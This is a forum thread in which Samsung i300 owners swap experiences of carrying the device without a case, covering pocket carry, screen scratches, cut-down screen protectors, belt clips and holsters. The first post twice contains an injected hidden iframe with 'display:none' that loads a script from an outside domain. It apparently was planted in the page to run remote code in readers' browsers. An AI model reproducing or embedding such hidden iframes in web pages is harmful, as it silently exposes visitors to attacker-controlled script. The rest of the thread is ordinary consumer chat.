+ Reply to Thread
Page 1 of 2 1 2 LastLast

Anyone tried using no case?

Just curious if anyone has tried the i300 without a case, ie just caring it around in your pocket. I was wondering what that does to screen life? Frustrated with the case options...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dan
    I've been using my I300 without a case since the day I bought it. I was concerned at first about the screen, so I got the equipment protection from Sprint. Though I will keep the protection, I'm not as worried anymore about the screen.

I keep it in my right pants pocket, screen inward. I've never had any problem with it except the fact that the screen gets a strange effect when it is warm (from my leg) but is unnoticable when the PDA is on and goes away after a few minutes out of my pocket. I've carried it in both my work slacks and jeans with no problems so far.

I had been consistantly using it without a case, however I recently bought one. I did get a small scratch on the screen, although I don't know how it got there. The biggest risk (IMHO) is putting keys into the same pocket with the phone. I also keep it in my front pants pocket, screen inward (against the leg).

I too utilize the equipment protection program (you're crazy if you don't). Someone once mentioned how they were able to get a scratch off the screen -- I would appreciate any help there....

Craig

no case; no antenna; no problem

You might consider the radiation implications of having the unit pressed up right against your leg. When radiation measurements are made, it is assumed the unit is held a few centimeters away from flesh.

No Case - follow-up

I also am trying out no case. What I do is pull it out by grabbing the antenna so that I don't inadvertently push any buttons. I had another Samsung phone (NPH-200) and used a Wilson leather case. It was great. I purchased the slightly larger Wilson leather case (which has a little zippered pocket on the back) and tried it for a day or two. It was too bulky, so I am going back to putting it into my pocket. I have ordered the Mack (bicycle) case that people have talked about, I will let you know when I get it how I like it.

Peter
    Peter

I made the mistake of carrying the '300 in my shirt pocket, and dinged the silver faceplate on some concrete steps, but it survived (I thought I'd remember not to bend over that far).

Front pants pocket carry seems to work fine, but I really like the $10 generic leather holster from Target. This is a drop-in case that allows you to view the top display on your belt. The elastic was a bit stiff at first, but it's getting better. My dad uses the same case with the 6035 I gave him, but it fits the '300 better.

Red face Removing Scratches?

Again, has anyone utilized any of the compounds that will supposedly buff out scratches? Please advise.

Craig

Scratches

My brother used the CompanionLink cleaner on his '35, and thought that made a difference for minor, hairline scratches.

My '300 slid into the works of a hide-a-bed the first week I owned it, resulting in a couple of 1/8 inch nicks on the screen (before I could order screen protectors or invoke the extended warrantee). My brother thought the nicks would be greatly minimized by the cleaning process, particularly in conjunction with their screen protector.

Sorry this isn't exactly what you're looking for, but I can get back to you on my attempts to fix some deep scratches after I get the supplies next week.

Brooke

Thanks Brooke! I look forward to hearing back from you on how it worked -- thank you!!

i've been using my i300 without the case now for a little over two weeks. no problems yet...i always try to keep it in a zippered pocket (jacket) and try to avoid pant pockets as the phone and other objects tend to slip out sometimes. i really miss the holster convenience of the startac timeport. however, no scratches YET. a fwe may show up in time...

No Case, but I use a screen protector

I have bee using the I300 with no case for quite some time now. I have not had any problems. But before I did so, I used some of the Fellows screen protectors. I had som left over for my older Palm. I just cut them down to fit the I300 screen.
    Those who can... do.
    Those who can't... get a certification from Microsoft

use a samsonite cell phone case -ten bucks -unit slips in-and out easy - case fits on belt -perfect

Smile Radio Shack Palm Screen Protectors

I carry mine in my pocket. I purchased a package of 16 palm screen protectors from Radio Shack. They don't have a size specifically for the i300, but I cut it down with scissors and it fits fine. Next time I may try tracing the i300 screen with tracing paper and using it as a pattern for cutting.

Radio Shack also has a mat that sticks to your dashboard that is great for placement of your i300 on car rides. Nothing seems to dislodge it from the mat which appears to be made from some space age polymer.

Finally, I also place my i300 in my pocket and have yet to experience any problems. I lock my keyboard before I stick it in my pocket.

Belt Clip?!

I got one of those handy belt clips ($8.95 at best Buy) with the included adhesive it works great. Belt clip snaps onto my waist and the phone snaps right into the clip. (Its like the kinda that a great deal of the Nokia users have.)

I do managed to bump into the walls quite a bit and so far the only thing I have done it managed a small scratch in the upper top corner of the case by the antenna. (stupid propane bottle!) Works great, but if I didn't have the product protection from best Buy and the insurance from SPCS, I would probably have a case and be paying much closer attention.

Just my two cents. Two weeks since my I300.....and counting..

Ontario....What carrier do you use there Mike? Another user was having difficulty setting up service in Canada.

No no no.....

Originally posted by mjorange
    Ontario....What carrier do you use there Mike? Another user was having difficulty setting up service in Canada.
    Thats CA for California, not Canada. Suprisingly how common that mistake occurs. We have an International Airport too. Sheesh

As for the Service in Canada, can't help him. But the SprintPCS service here is outstanding. Now if I could just get them to reengineer my office building only this time leaving out the lead lined walls.

Hey Mike,

I took a similar approach (at least until my EB ase gets here) except I applied the little stud to the cheap case that came with my i300. I didn't want to alter the phone or the battery by attaching anything to them.
    It's working so far.
    G Craig

Love that idea. I might just try that!

Thumbs up Re: Belt Clip?!

Originally posted by MikeAWood
    I got one of those handy belt clips ($8.95 at best Buy) with the included adhesive it works great. Belt clip snaps onto my waist and the phone snaps right into the clip. (Its like the kinda that a great deal of the Nokia users have.)

I do managed to bump into the walls quite a bit and so far the only thing I have done it managed a small scratch in the upper top corner of the case by the antenna. (stupid propane bottle!) Works great, but if I didn't have the product protection from best Buy and the insurance from SPCS, I would probably have a case and be paying much closer attention.

Just my two cents. Two weeks since my I300.....and counting..
    So Mike, did you "adhesive" the little nobby thingy on to the back of the unit? I assume this is what you did. I have thought a lot about doing that -- if only someone could come up with a little flip style cover for the glass. Actually, it would be quite easy. It could attach below the bottom 3 holes of the earpiece, just above the beveled part that displays the Sprint logo.

Any handy folks out there think they can do this? We might have something here! :p

Craig
    I thought grafitti was illegal?